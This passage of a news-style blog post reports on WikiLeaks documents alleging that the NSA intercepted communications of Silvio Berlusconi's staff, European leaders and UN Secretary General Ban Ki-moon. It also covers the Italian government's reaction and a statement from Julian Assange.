According to these documents leaked by Assange’s organization, the NSA targeted targeted all the members of the Silvio Berlusconi’s staff, including his personal advisor Valentino Valentini, Berlusconi’s National Security Advisor Bruno Archi, Marco Carnelos, and the Permanent Representative of Italy to the NATO, Stefano Stefanini.

In October 2011, the NSA also intercepted a Valentino Valentini’s top-secret/Noforn document.

Documents confirms the US intelligence also intercepted a critical private meeting between then French president Nicolas Sarkozy, Merkel and Berlusconi, where Sarkozy defined the situation of the Italian banking system as ready to “pop like a cork.”

Which is the position of the Italian Government?

Many Italian security experts are not surprised by these revelations, myself included, from the institutional perspective, it seems that the current Italian Government is ignoring the serious facts.

“The current Italian PM, Matteo Renzi, has essentially ignored the case, whereas the former Italian PM, Enrico Letta, speaking to the Chamber of Deputies in the midst of the most heated phases of the Nsa scandal, declared: «Based on the analysis conducted by our intelligence services and our international contacts, we are not aware that the security of the communications of the Italian government and embassies has been compromised, nor are we aware that the privacy of Italian citizens has been compromised». continues the Expresso.

The Italian government has summoned the American ambassador to Rome following the embarrassing revelations.

The document disclosed by Wikileaks also revealed other operations conducted by the US Intelligence, including the interception of the top EU and Japanese trade ministers.

“Today we proved the UN Secretary General Ban Ki-Moon’s private meetings over how to save the planet from climate change were bugged by a country intent on protecting its largest oil companies. Back in 2010 we revealed that the then US Secretary of State Hillary Clinton had ordered her diplomats to steal the UN leadership’s biometric data and other information. The US government has signed agreements with the UN that it will not engage in such conduct. It will be interesting to see the UN’s reaction, because if the United Nations Secretary General, whose communications and person have legal inviolability, can be repeatedly attacked without consequence then everyone is at risk.” said WikiLeaks editor Julian Assange.